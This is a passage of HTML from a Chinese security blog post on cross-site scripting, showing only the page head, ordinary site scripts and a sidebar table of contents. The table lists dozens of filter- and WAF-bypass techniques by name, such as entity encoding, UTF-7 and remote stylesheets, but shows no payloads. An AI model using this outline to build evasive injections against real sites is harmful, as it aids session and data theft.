<!DOCTYPE html>
<html>

<head>
  
  <!-- Begin Jekyll SEO tag v2.6.1 -->
<title>xss | lazycat</title>
<meta name="generator" content="Jekyll v3.8.5" />
<meta property="og:title" content="xss" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="[toc]" />
<meta property="og:description" content="[toc]" />
<link rel="canonical" href="http://localhost:4000/_posts/2020-07-11-xss/" />
<meta property="og:url" content="http://localhost:4000/_posts/2020-07-11-xss/" />
<meta property="og:site_name" content="lazycat" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-07-11T00:00:00-04:00" />
<script type="application/ld+json">
{"@type":"BlogPosting","url":"http://localhost:4000/_posts/2020-07-11-xss/","headline":"xss","dateModified":"2020-07-11T00:00:00-04:00","datePublished":"2020-07-11T00:00:00-04:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/_posts/2020-07-11-xss/"},"description":"[toc]","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  
  
  <meta
  name="viewport"
  content="width=device-width, initial-scale=1.0, maximum-scale=1"
/>
<meta
  http-equiv="content-type"
  content="text/html; charset=utf-8"
/>
<link
  rel="alternate"
  href="/feed.xml"
  title="RSS"
  type="application/rss+xml"
/>

  
  <link
  rel="apple-touch-icon-precomposed"
  href="https://pic.cr173.com/up/2017-8/2017841818322084.jpg"
/>
<link
  rel="shortcut
  icon"
  href="https://pic.cr173.com/up/2017-8/2017841818322084.jpg"
/>

  
  <link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/combine/gh/poole/lanyon@v1.1.0/public/css/poole.min.css,gh/poole/lanyon@v1.1.0/public/css/lanyon.min.css"
/>

  
  <link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.13.0/css/all.min.css"
/>

  
  <link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/gh/Dreamer-Paul/Pio@2.4/static/pio.min.css"
/>
<script
  async="async"
  src="https://cdn.jsdelivr.net/combine/gh/Dreamer-Paul/Pio@2.4/static/l2d.min.js,gh/Dreamer-Paul/Pio@2.4/static/pio.min.js"
  onload='
      let pio_container = document.createElement("div");
      pio_container.classList.add("pio-container");
      pio_container.classList.add("right");
      pio_container.style.bottom = "-2rem";
      pio_container.style.zIndex = "1";
      document.body.insertAdjacentElement("beforeend", pio_container);
      let pio_action = document.createElement("div");
      pio_action.classList.add("pio-action");
      pio_container.insertAdjacentElement("beforeend", pio_action);
      let pio_canvas = document.createElement("canvas");
      pio_canvas.id = "pio";
      pio_canvas.style.width = "14rem";
      pio_canvas.width = "600";
      pio_canvas.height = "800";
      pio_container.insertAdjacentElement("beforeend", pio_canvas);
      let pio = new Paul_Pio({
        "mode": "fixed",
        "hidden": true,
        "night": "for(let i=7; i<16; ++i) if(document.body.classList.contains(`theme-base-0`+i.toString(16))) { document.body.classList.remove(`theme-base-0`+i.toString(16)); document.body.classList.add(`theme-base-0`+((i-6)%9+7).toString(16)); break; }",
        "content": {
          "link": ["https://jekyll-theme-WuK.wu-kan.cn"],
          "skin": ["要换成我的朋友吗？", "让她放个假吧~"],
          "hidden": true,
          "custom": [{
            "selector": "a",
            "type": "link",
          }, {
            "selector": ".sidebar-toggle",
            "text": "打开侧边栏叭~"
          }, {
            "selector": ".effect-info",
            "text": "哇，你发现了什么！"
          }, {
            "selector": "#sidebar-search-input",
            "text": "想搜索什么呢？很多干货哦！"
          }, {
            "selector": "#toc",
            "text": "这是目录~"
          }, {
            "selector": ".page-title",
            "text": "这是标题~"
          }, {
            "selector": ".v",
            "text": "评论没有审核，要对自己的发言负责哦~"
          }]
        },
        "model": [
          "https:\/\/cdn.jsdelivr.net/gh/imuncle/live2d/model/33/model.2018.bls-winter.json",
          "https:\/\/cdn.jsdelivr.net/gh/imuncle/live2d/model/platelet-2/model.json",
          "https:\/\/cdn.jsdelivr.net/gh/imuncle/live2d/model/xiaomai/xiaomai.model.json",
          "https:\/\/cdn.jsdelivr.net/gh/imuncle/live2d/model/mashiro/seifuku.model.json",
          "https:\/\/cdn.jsdelivr.net/gh/imuncle/live2d/model/Violet/14.json",
          "https:\/\/cdn.jsdelivr.net/gh/xiaoski/live2d_models_collection/Kobayaxi/Kobayaxi.model.json",
          "https:\/\/cdn.jsdelivr.net/gh/xiaoski/live2d_models_collection/mikoto/mikoto.model.json",
          "https:\/\/cdn.jsdelivr.net/gh/xiaoski/live2d_models_collection/uiharu/uiharu.model.json"]
      });'
></script>

  
  <script
  src='https://zz.bdstatic.com/linksubmit/push.js'
  async="async"
></script>

  
  <script
  async="async"
  src="https://www.googletagmanager.com/gtag/js?id=UA-163543967-1"
  onload="
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-163543967-1');"
></script>

  
  <style>
  .wrap {
    transition-property: width,background-size,transform;
    transition-duration: .3s;
    transition-timing-function: ease-in-out;
    min-height: 100%;
    display: inline-block;
    background-size: 100% auto;
    background-position: 0% 0%;
    background-repeat: no-repeat;
    background-attachment: fixed;
    background-image: url(http://img.mp.sohu.com/upload/20170801/1eefea1125e6414d8af68aa91920cdf5_th.png);
  }
  @media (min-aspect-ratio: 2400/1850) {
    .wrap {
      background-image: url(http://img.mp.sohu.com/upload/20170801/1eefea1125e6414d8af68aa91920cdf5_th.png);
    }
  }
  .sidebar-overlay #sidebar-checkbox:checked ~ .wrap {
    width: calc(100% - 14rem);
    background-size: calc(100% - 14rem) auto;
    transform: translateX(14rem);
  }
  .layout-reverse.sidebar-overlay #sidebar-checkbox:checked ~ .wrap {
    transform: translateX(0);
  }
</style>

  
  <style>
  .sidebar,
  html,
  h1,
  h2,
  h3,
  h4,
  h5,
  h6 {
    font-family: PingFang SC, Menlo, Monaco, "Courier New", Microsoft JhengHei, monospace;
  }
</style>

  
  <style>
  h1,
  h2,
  h3,
  h4,
  h5,
  h6 {
    font-weight: bold;
  }
</style>

  
  <style>
  img {
    display: inline-block;
    margin: 0;
  }
</style>

  
  <style>
  ::-webkit-scrollbar {
    width: 3px;
    height: 3px;
  }
  ::-webkit-scrollbar-thumb {
    background-image: linear-gradient(45deg, Cyan 0%, Magenta 50%, Yellow 100%);
  }
</style>

  
  <style>
  ::selection {
    color: White;
    background: Black;
  }
</style>

  
</head>

<body
  class="theme-base-07 sidebar-overlay">
  
  
  
  <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular
     styles, `#sidebar-checkbox` for behavior. -->
  <input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox"
     />
  <!-- Toggleable sidebar -->
  <div class="sidebar" id="sidebar">
    
    <div class="sidebar-item">
      <div class="effect effect-right_to_left">
        <img class="effect-img" src="https://pic.cr173.com/up/2017-8/2017841818322084.jpg" alt="img" />
        <div class="effect-info">
          lazycat<br/>
<a href="mailto:verylazycat@outlook.com">
  <i class="fas fa-envelope"></i>
</a>
<a href="https://github.com/verylazycat">
  <i class="fab fa-github"></i>
</a>

        </div>
      </div>
    </div>
    
    <nav class="sidebar-nav">
      
      <a class="sidebar-nav-item" href="/">
        <i class="fas fa-home fa-fw"></i> 首页
      </a>
      
      <a class="sidebar-nav-item" href="/comments/">
        <i class="fas fa-comments fa-fw"></i> 留言
      </a>
      
      <a class="sidebar-nav-item" href="/tags/">
        <i class="fas fa-tags fa-fw"></i> 标签
      </a>
      
      <a class="sidebar-nav-item" href="/archive/">
        <i class="fas fa-archive fa-fw"></i> 归档
      </a>
      
      <a class="sidebar-nav-item" href="/merger/">
        <i class="fas fa-coffee fa-fw"></i> 打赏
      </a>
      
    </nav>
    <div class="sidebar-item">
      
      <style>
  #sidebar-search-input {
    background: none;
    border: none;
    color: White;
    width: 100%;
  }
  #sidebar-search-results-container {
    overflow: auto auto;
    max-height: 50vh;
  }
</style>
<input
  id="sidebar-search-input"
  placeholder="搜索博文"
/>
<ol
  id="sidebar-search-results-container"
></ol>
<script
  src='https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.7/dest/simple-jekyll-search.min.js'
  async='async'
  onload='
    SimpleJekyllSearch({
      json: "/assets/simple-jekyll-search/search.json",
      searchInput: document.getElementById("sidebar-search-input"),
      resultsContainer: document.getElementById("sidebar-search-results-container"),
      searchResultTemplate: `<li><a href="{url}">{title}</a></li>`,
      limit: 999,
      fuzzy: true
    })'
></script>

      
      
      <style>
  #toc {
    overflow: auto auto;
    max-height: 50vh;
  }
</style>

      <ol id="toc">
  <li><a href="#xss%E6%A6%82%E5%BF%B5">XSS概念</a></li>
  <li><a href="#%E5%88%86%E7%B1%BB">分类</a></li>
  <li><a href="#%E5%8E%9F%E7%90%86">原理</a>
    <ol>
      <li><a href="#%E5%8F%8D%E5%B0%84%E5%9E%8B">反射型</a></li>
      <li><a href="#%E5%AD%98%E5%82%A8%E5%9E%8B">存储型</a></li>
      <li><a href="#dom%E5%9E%8B">DOM型</a></li>
    </ol>
  </li>
  <li><a href="#%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E5%99%A8">绕过过滤器</a>
    <ol>
      <li><a href="#xss%E5%AE%9A%E4%BD%8D%E5%99%A8">XSS定位器</a></li>
      <li><a href="#%E6%97%A0%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87">无过滤绕过</a></li>
      <li><a href="#%E5%88%A9%E7%94%A8%E5%A4%9A%E8%AF%AD%E8%A8%80%E8%BF%9B%E8%A1%8C%E8%BF%87%E6%BB%A4%E7%BB%95%E8%BF%87">利用多语言进行过滤绕过</a></li>
      <li><a href="#%E9%80%9A%E8%BF%87javascript%E5%91%BD%E4%BB%A4%E5%AE%9E%E7%8E%B0%E7%9A%84%E5%9B%BE%E7%89%87xss">通过JavaScript命令实现的图片XSS</a></li>
      <li><a href="#%E6%97%A0%E5%88%86%E5%8F%B7%E6%97%A0%E5%BC%95%E5%8F%B7">无分号无引号</a></li>
      <li><a href="#%E4%B8%8D%E5%8C%BA%E5%88%86%E5%A4%A7%E5%B0%8F%E5%86%99%E7%9A%84xss%E6%94%BB%E5%87%BB%E5%90%91%E9%87%8F">不区分大小写的XSS攻击向量</a></li>
      <li><a href="#html%E5%AE%9E%E4%BD%93">HTML实体</a></li>
      <li><a href="#%E9%87%8D%E9%9F%B3%E7%AC%A6%E6%B7%B7%E6%B7%86">重音符混淆</a></li>
      <li><a href="#%E7%95%B8%E5%BD%A2%E7%9A%84a%E6%A0%87%E7%AD%BE">畸形的A标签</a></li>
      <li><a href="#%E7%95%B8%E5%BD%A2%E7%9A%84img%E6%A0%87%E7%AD%BE">畸形的IMG标签</a></li>
      <li><a href="#fromcharcode%E5%87%BD%E6%95%B0">fromCharCode函数</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E9%BB%98%E8%AE%A4src%E5%B1%9E%E6%80%A7%E7%BB%95%E8%BF%87src%E5%9F%9F%E5%90%8D%E8%BF%87%E6%BB%A4%E5%99%A8">使用默认SRC属性绕过SRC域名过滤器</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E9%BB%98%E8%AE%A4%E4%B8%BA%E7%A9%BA%E7%9A%84src%E5%B1%9E%E6%80%A7">使用默认为空的SRC属性</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E4%B8%8D%E5%90%ABsrc%E5%B1%9E%E6%80%A7">使用不含SRC属性</a></li>
      <li><a href="#%E9%80%9A%E8%BF%87error%E4%BA%8B%E4%BB%B6%E8%A7%A6%E5%8F%91alert">通过error事件触发alert</a></li>
      <li><a href="#%E5%AF%B9img%E6%A0%87%E7%AD%BE%E4%B8%ADonerror%E5%B1%9E%E6%80%A7%E8%BF%9B%E8%A1%8C%E7%BC%96%E7%A0%81">对IMG标签中onerror属性进行编码</a></li>
      <li><a href="#%E5%8D%81%E8%BF%9B%E5%88%B6html%E5%AD%97%E7%AC%A6%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81">十进制HTML字符实体编码</a></li>
      <li><a href="#%E4%B8%8D%E5%B8%A6%E5%88%86%E5%8F%B7%E7%9A%84%E5%8D%81%E8%BF%9B%E5%88%B6html%E5%AD%97%E7%AC%A6%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81">不带分号的十进制HTML字符实体编码</a></li>
      <li><a href="#%E4%B8%8D%E5%B8%A6%E5%88%86%E5%8F%B7%E7%9A%84%E5%8D%81%E5%85%AD%E8%BF%9B%E5%88%B6html%E5%AD%97%E7%AC%A6%E5%AE%9E%E4%BD%93%E7%BC%96%E7%A0%81">不带分号的十六进制HTML字符实体编码</a></li>
      <li><a href="#%E5%86%85%E5%B5%8Ctab">内嵌TAB</a></li>
      <li><a href="#%E5%86%85%E5%B5%8C%E7%BC%96%E7%A0%81%E5%90%8Etab">内嵌编码后TAB</a></li>
      <li><a href="#%E5%86%85%E5%B5%8C%E6%8D%A2%E8%A1%8C%E5%88%86%E9%9A%94xss%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81">内嵌换行分隔XSS攻击代码</a></li>
      <li><a href="#%E5%86%85%E5%B5%8C%E5%9B%9E%E8%BD%A6%E5%88%86%E9%9A%94xss%E6%94%BB%E5%87%BB%E4%BB%A3%E7%A0%81">内嵌回车分隔XSS攻击代码</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E7%A9%BA%E5%AD%97%E7%AC%A6%E5%88%86%E9%9A%94javascript%E6%8C%87%E4%BB%A4">使用空字符分隔JavaScript指令</a></li>
      <li><a href="#%E5%88%A9%E7%94%A8img%E6%A0%87%E7%AD%BE%E4%B8%ADjavascript%E6%8C%87%E4%BB%A4%E5%89%8D%E7%9A%84%E7%A9%BA%E6%A0%BC%E5%92%8C%E5%85%83%E5%AD%97%E7%AC%A6">利用IMG标签中JavaScript指令前的空格和元字符</a></li>
      <li><a href="#%E5%88%A9%E7%94%A8%E9%9D%9E%E5%AD%97%E6%AF%8D%E9%9D%9E%E6%95%B0%E5%AD%97%E5%AD%97%E7%AC%A6">利用非字母非数字字符</a></li>
      <li><a href="#%E9%A2%9D%E5%A4%96%E7%9A%84%E5%B0%96%E6%8B%AC%E5%8F%B7">额外的尖括号</a></li>
      <li><a href="#%E6%9C%AA%E9%97%AD%E5%90%88%E7%9A%84script%E6%A0%87%E7%AD%BE">未闭合的script标签</a></li>
      <li><a href="#script%E6%A0%87%E7%AD%BE%E4%B8%AD%E7%9A%84%E5%8D%8F%E8%AE%AE%E8%A7%A3%E6%9E%90">script标签中的协议解析</a></li>
      <li><a href="#%E5%8F%AA%E5%90%AB%E5%B7%A6%E5%B0%96%E6%8B%AC%E5%8F%B7%E7%9A%84htmljavascript-xss%E5%90%91%E9%87%8F">只含左尖括号的HTML/JavaScript XSS向量</a></li>
      <li><a href="#%E5%A4%9A%E4%B8%AA%E5%B7%A6%E5%B0%96%E6%8B%AC%E5%8F%B7">多个左尖括号</a></li>
      <li><a href="#javascript%E5%8F%8C%E9%87%8D%E8%BD%AC%E4%B9%89">JavaScript双重转义</a></li>
      <li><a href="#%E9%97%AD%E5%90%88title%E6%A0%87%E7%AD%BE">闭合title标签</a></li>
      <li><a href="#input-image">INPUT image</a></li>
      <li><a href="#body-image">BODY image</a></li>
      <li><a href="#img-dynsrc">IMG Dynsrc</a></li>
      <li><a href="#img-lowsrc">IMG lowsrc</a></li>
      <li><a href="#list-style-image">List-style-image</a></li>
      <li><a href="#%E5%9B%BE%E7%89%87%E4%B8%AD%E5%BC%95%E7%94%A8vbscript">图片中引用VBscript</a></li>
      <li><a href="#livescript-%E4%BB%85%E9%99%90%E6%97%A7%E7%89%88%E6%9C%ACnetscape">Livescript (仅限旧版本Netscape)</a></li>
      <li><a href="#svg%E5%AF%B9%E8%B1%A1%E6%A0%87%E7%AD%BE">SVG对象标签</a></li>
      <li><a href="#ecmascript-6">ECMAScript 6</a></li>
      <li><a href="#body%E6%A0%87%E7%AD%BE">BODY标签</a></li>
      <li><a href="#%E4%BA%8B%E4%BB%B6%E5%A4%84%E7%90%86%E7%A8%8B%E5%BA%8F">事件处理程序</a></li>
      <li><a href="#bgsound">BGSOUND</a></li>
      <li><a href="#-javascript%E5%8C%85%E5%90%AB">&amp; JavaScript包含</a></li>
      <li><a href="#%E6%A0%B7%E5%BC%8F%E8%A1%A8">样式表</a></li>
      <li><a href="#%E8%BF%9C%E7%A8%8B%E6%A0%B7%E5%BC%8F%E8%A1%A8">远程样式表</a></li>
      <li><a href="#%E8%BF%9C%E7%A8%8B%E6%A0%B7%E5%BC%8F%E8%A1%A82">远程样式表2</a></li>
      <li><a href="#%E8%BF%9C%E7%A8%8B%E6%A0%B7%E5%BC%8F%E8%A1%A83">远程样式表3</a></li>
      <li><a href="#%E8%BF%9C%E7%A8%8B%E6%A0%B7%E5%BC%8F%E8%A1%A84">远程样式表4</a></li>
      <li><a href="#%E5%90%AB%E6%9C%89%E5%88%86%E9%9A%94javascript%E7%9A%84style%E6%A0%87%E7%AD%BE">含有分隔JavaScript的STYLE标签</a></li>
      <li><a href="#style%E5%B1%9E%E6%80%A7%E4%B8%AD%E4%BD%BF%E7%94%A8%E6%B3%A8%E9%87%8A%E5%88%86%E9%9A%94%E8%A1%A8%E8%BE%BE%E5%BC%8F">STYLE属性中使用注释分隔表达式</a></li>
      <li><a href="#%E5%90%AB%E8%A1%A8%E8%BE%BE%E5%BC%8F%E7%9A%84img-style">含表达式的IMG STYLE</a></li>
      <li><a href="#style%E6%A0%87%E7%AD%BE%E4%BB%85%E6%97%A7%E7%89%88%E6%9C%ACnetscape%E5%8F%AF%E7%94%A8">STYLE标签（仅旧版本Netscape可用）</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E8%83%8C%E6%99%AF%E5%9B%BE%E5%83%8F%E7%9A%84style%E6%A0%87%E7%AD%BE">使用背景图像的STYLE标签</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E8%83%8C%E6%99%AF%E7%9A%84style%E6%A0%87%E7%AD%BE">使用背景的STYLE标签</a></li>
      <li><a href="#%E5%90%ABstyle%E5%B1%9E%E6%80%A7%E7%9A%84html%E4%BB%BB%E6%84%8F%E6%A0%87%E7%AD%BE">含STYLE属性的HTML任意标签</a></li>
      <li><a href="#%E6%9C%AC%E5%9C%B0htc%E6%96%87%E4%BB%B6">本地htc文件</a></li>
      <li><a href="#us-ascii%E7%BC%96%E7%A0%81">US-ASCII编码</a></li>
      <li><a href="#meta">META</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E6%95%B0%E6%8D%AE%E7%9A%84meta">使用数据的META</a></li>
      <li><a href="#%E5%90%AB%E6%9C%89%E9%A2%9D%E5%A4%96url%E5%8F%82%E6%95%B0%E7%9A%84meta">含有额外URL参数的META</a></li>
      <li><a href="#iframe">IFRAME</a></li>
      <li><a href="#%E5%9F%BA%E4%BA%8E%E4%BA%8B%E4%BB%B6iframe">基于事件IFRAME</a></li>
      <li><a href="#frame">FRAME</a></li>
      <li><a href="#table">TABLE</a></li>
      <li><a href="#td">TD</a></li>
      <li><a href="#div">DIV</a></li>
      <li><a href="#%E5%90%AB%E6%9C%89unicode-xss%E5%88%A9%E7%94%A8%E4%BB%A3%E7%A0%81%E7%9A%84div%E8%83%8C%E6%99%AF%E5%9B%BE%E5%83%8F">含有Unicode XSS利用代码的DIV背景图像</a></li>
      <li><a href="#%E5%90%AB%E6%9C%89%E9%A2%9D%E5%A4%96%E5%AD%97%E7%AC%A6%E7%9A%84div%E8%83%8C%E6%99%AF%E5%9B%BE%E5%83%8F">含有额外字符的DIV背景图像</a></li>
      <li><a href="#div%E8%A1%A8%E8%BE%BE%E5%BC%8F">DIV表达式</a></li>
      <li><a href="#html-%E6%9D%A1%E4%BB%B6%E9%80%89%E6%8B%A9%E6%B3%A8%E9%87%8A%E5%9D%97">html 条件选择注释块</a></li>
      <li><a href="#base%E6%A0%87%E7%AD%BE">BASE标签</a></li>
      <li><a href="#object%E6%A0%87%E7%AD%BE">OBJECT标签</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8embed%E6%A0%87%E7%AD%BE%E5%8A%A0%E8%BD%BD%E5%90%AB%E6%9C%89xss%E7%9A%84flash%E6%96%87%E4%BB%B6">使用EMBED标签加载含有XSS的FLASH文件</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8embed-svg%E5%8C%85%E5%90%AB%E6%94%BB%E5%87%BB%E5%90%91%E9%87%8F">使用EMBED SVG包含攻击向量</a></li>
      <li><a href="#%E5%9C%A8flash%E4%B8%AD%E4%BD%BF%E7%94%A8actionscript%E6%B7%B7%E6%B7%86xss%E6%94%BB%E5%87%BB%E5%90%91%E9%87%8F">在FLASH中使用ActionScript混淆XSS攻击向量</a></li>
      <li><a href="#cdata%E6%B7%B7%E6%B7%86%E7%9A%84xml%E6%95%B0%E6%8D%AE%E5%B2%9B">CDATA混淆的XML数据岛</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8xml%E6%95%B0%E6%8D%AE%E5%B2%9B%E7%94%9F%E6%88%90%E5%90%AB%E5%86%85%E5%B5%8Cjavascript%E7%9A%84%E6%9C%AC%E5%9C%B0xml%E6%96%87%E4%BB%B6">使用XML数据岛生成含内嵌JavaScript的本地XML文件</a></li>
      <li><a href="#xml%E4%B8%AD%E4%BD%BF%E7%94%A8htmltime">XML中使用HTML+TIME</a></li>
      <li><a href="#%E4%BD%BF%E7%94%A8%E4%B8%80%E4%BA%9B%E5%AD%97%E7%AC%A6%E7%BB%95%E8%BF%87js%E8%BF%87%E6%BB%A4">使用一些字符绕过”.js”过滤</a></li>
      <li><a href="#ssi%E6%9C%8D%E5%8A%A1%E7%AB%AF%E8%84%9A%E6%9C%AC%E5%8C%85%E5%90%AB">SSI（服务端脚本包含）</a></li>
      <li><a href="#php">PHP</a></li>
      <li><a href="#%E5%B5%8C%E5%85%A5%E5%91%BD%E4%BB%A4%E7%9A%84image">嵌入命令的IMAGE</a></li>
      <li><a href="#%E5%B5%8C%E5%85%A5%E5%91%BD%E4%BB%A4%E7%9A%84image-ii">嵌入命令的IMAGE II</a></li>
      <li><a href="#cookie%E7%AF%A1%E6%94%B9">Cookie篡改</a></li>
      <li><a href="#utf-7%E7%BC%96%E7%A0%81">UTF-7编码</a></li>
      <li><a href="#%E5%88%A9%E7%94%A8html%E5%BC%95%E5%8F%B7%E5%8C%85%E5%90%AB%E7%9A%84xss">利用HTML引号包含的XSS</a></li>
      <li><a href="#url%E5%AD%97%E7%AC%A6%E7%BB%95%E8%BF%87">URL字符绕过</a>
        <ol>
          <li><a href="#%E6%B7%B7%E5%90%88%E7%BC%96%E7%A0%81">混合编码</a></li>
        </ol>
      </li>
      <li><a href="#%E5%AD%97%E7%AC%A6%E8%BD%AC%E4%B9%89%E8%A1%A8">字符转义表</a></li>
    </ol>
  </li>
  <li><a href="#%E7%BB%95%E8%BF%87waf%E7%9A%84%E6%96%B9%E6%B3%95">绕过WAF的方法</a>
    <ol>
      <li><a href="#%E9%80%9A%E7%94%A8%E9%97%AE%E9%A2%98">通用问题</a>
        <ol>
          <li><a href="#%E5%AD%98%E5%82%A8%E5%9E%8Bxss">存储型XSS</a></li>
          <li><a href="#%E5%9F%BA%E4%BA%8Ejavascript%E7%9A%84%E5%8F%8D%E5%B0%84%E5%9E%8Bxss">基于JavaScript的反射型XSS</a></li>
          <li><a href="#%E5%9F%BA%E4%BA%8Edom%E7%9A%84xss">基于DOM的XSS</a></li>
        </ol>
      </li>
      <li><a href="#%E9%80%9A%E8%BF%87%E8%AF%B7%E6%B1%82%E9%87%8D%E5%AE%9A%E5%90%91%E6%9E%84%E9%80%A0xss">通过请求重定向构造XSS</a></li>
      <li><a href="#alert%E6%B7%B7%E6%B7%86%E4%BB%A5%E7%BB%95%E8%BF%87%E8%BF%87%E6%BB%A4%E5%99%A8">Alert混淆以绕过过滤器</a></li>
    </ol>
  </li>
  <li><a href="#xss%E6%89%AB%E6%8F%8F%E5%B7%A5%E5%85%B7">xss扫描工具</a>
    <ol>
      <li><a href="#%E5%9F%BA%E7%A1%80%E7%94%A8%E6%B3%95">基础用法</a></li>
    </ol>
  </li>
  <li><a href="#xss%E9%98%B2%E8%8C%83">xss防范</a></li>
</ol>
      
      
      <style>
  .sidebar-checkbox {
    display: none;
  }
  .sidebar-toggle {
    position: fixed;
  }
</style>

      
      <style>
  .effect {
    margin: 1rem;
    perspective: 900px;
  }
  .effect-info {
    text-align: center;
    backface-visibility: hidden;
    position: absolute;
    top: 0;
    transform-style: preserve-3d;
  }
  .effect-img {
    z-index: 11;
    width: 100%;
    height: 100%;
    position: relative;
    transition: all 0.5s ease-in-out;
  }
  .effect-img:before {
    position: absolute;
    display: block;
  }
  .effect-right_to_left .effect-img {
    transform-origin: 0% 50%;
  }
  .effect-right_to_left:hover .effect-img {
    transform: rotate3d(0, 1, 0, -180deg);
  }
</style>

      
      <div>
  <i class="fas fa-cog fa-spin fa-fw"></i>
  <span id="run_time_day">
    <i class="fas fa-spinner fa-pulse"></i>
  </span>天
  <span id="run_time_hour">
    <i class="fas fa-spinner fa-pulse"></i>
  </span>时
  <span id="run_time_minute">
    <i class="fas fa-spinner fa-pulse"></i>
  </span>分
  <span id="run_time_second">
    <i class="fas fa-spinner fa-pulse"></i>
  </span>秒
  <script>
    setInterval(function (d,h,m,s,b) {
      function setzero(i) {
        return i < 10 ? "0" + i : i;
      }
      let BirthDay = new Date(b);
      let today = new Date();
      let timeold = (today.getTime() - BirthDay.getTime());
      let sectimeold = timeold / 1000;
      let secondsold = Math.floor(sectimeold);
      let msPerDay = 24 * 60 * 60 * 1000;
      let e_daysold = timeold / msPerDay;
      let daysold = Math.floor(e_daysold);
      let e_hrsold = (e_daysold - daysold) * 24;
      let hrsold = Math.floor(e_hrsold);
      let e_minsold = (e_hrsold - hrsold) * 60;
      let minsold = Math.floor((e_hrsold - hrsold) * 60);
      let seconds = Math.floor((e_minsold - minsold) * 60);
      d.textContent = daysold;
      h.textContent = setzero(hrsold);
      m.textContent = setzero(minsold);
      s.textContent = setzero(seconds);
    },
    1000,
    document.getElementById("run_time_day"),
    document.getElementById("run_time_hour"),
    document.getElementById("run_time_minute"),
    document.getElementById("run_time_second"),
    "05/02/2020 11:03:56")// 这是我第一篇博客的时间
  </script>
</div>

      
      <div>
  <div>
    <i class="fas fa-eye fa-fw"></i>
    <span id="busuanzi_value_page_pv">
      <i class="fas fa-spinner fa-pulse"></i>
    </span>次
  </div>
  <div>
    <i class="fas fa-paw fa-fw"></i>
    <span id="busuanzi_value_site_pv">
      <i class="fas fa-spinner fa-pulse"></i>
    </span>枚
  </div>
  <div>
    <i class="fas fa-user-friends fa-fw"></i>
    <span id="busuanzi_value_site_uv">
      <i class="fas fa-spinner fa-pulse"></i>
    </span>人
  </div>
  <script
    src='https://cdn.jsdelivr.net/npm/busuanzi@2.3.0'
    async='async'
  ></script>
</div>

      
      <div>
  <i class="fas fa-copyright fa-fw"></i>
  2020-2022 lazycat
</div>

      
      <div>
  <i class="fas fa-info-circle fa-fw"></i>
  <a href="http://beian.miit.gov.cn">
    蜀ICP备20011774号
  </a>
</div>

      
      
    </div>
  </div>
  <!-- Wrap is the content to shift when toggling the sidebar. We wrap the content to avoid any CSS collisions with our real content. -->
  
  <div class="wrap">
    
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/katex@0.11.1/dist/katex.min.css"
/>
<script
  src="https://cdn.jsdelivr.net/combine/npm/katex@0.11.1/dist/katex.min.js,npm/katex@0.11.1/dist/contrib/mathtex-script-type.min.js,npm/katex@0.11.1/dist/contrib/auto-render.min.js"
  defer="defer"
  onload='renderMathInElement(document.body, { delimiters: [{ left: "$", right: "$", display: false }] })'
></script>



<style>
  pre.language-mermaid,
  code.language-mermaid {
    display: none;
  }
</style>
<script
  src="https://cdn.jsdelivr.net/npm/mermaid@8.5.1/dist/mermaid.min.js"
  defer="defer"
  onload='
    for(let x of document.getElementsByClassName("language-mermaid"))
      if(x.nodeName=="CODE")
      {
        let m = document.createElement("div");
        m.classList.add("mermaid");
        m.textContent = x.textContent;
        x.parentNode.insertAdjacentElement("beforebegin", m);
      }'
></script>



<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/combine/npm/prismjs@1.20.0/plugins/line-numbers/prism-line-numbers.min.css,npm/prismjs@1.20.0/plugins/toolbar/prism-toolbar.min.css,gh/PrismJS/prism-themes@1955cfef6953b3a59e66016e8a1e016b45d6cc79/themes/prism-nord.min.css"
/>
<script
  src="https://cdn.jsdelivr.net/combine/npm/prismjs@1.20.0/components/prism-core.min.js,npm/prismjs@1.20.0/plugins/autoloader/prism-autoloader.min.js,npm/prismjs@1.20.0/plugins/line-numbers/prism-line-numbers.min.js,npm/prismjs@1.20.0/plugins/toolbar/prism-toolbar.min.js"
  defer="defer"
  onload='
    Prism.plugins.autoloader.languages_path = "https:\/\/cdn.jsdelivr.net/npm/prismjs/components/";
    for(let x of document.getElementsByTagName("pre"))
      x.classList.add("line-numbers");
    Prism.plugins.toolbar.registerButton("select-code", function (env) {
      let button = document.createElement("button");
      button.textContent = "select this " + env.language;
      button.addEventListener("click", function () {
        if (document.body.createTextRange) {
          let range = document.body.createTextRange();
          range.moveToElementText(env.element);
          range.select();
        } else if (window.getSelection) {
          let selection = window.getSelection();
          let range = document.createRange();
          range.selectNodeContents(env.element);
          selection.removeAllRanges();
            selection.addRange(range);
        }
      });
      return button;
    })'
></script>



<style>
  pre {
    max-height: 50vh;
    overflow: auto;
  }
</style>


<style>
  @media (min-width: 56em) {
    .container {
      max-width: 66.6%;
    }
  }
</style>


<style>
  .masthead,
  .container.content {
    padding-top: 1rem;
    padding-bottom: 1rem;
    box-shadow: 0 0 .75rem rgba(0, 0, 0, 0.1);
    background-color: rgba(255, 255, 255, 0.95);
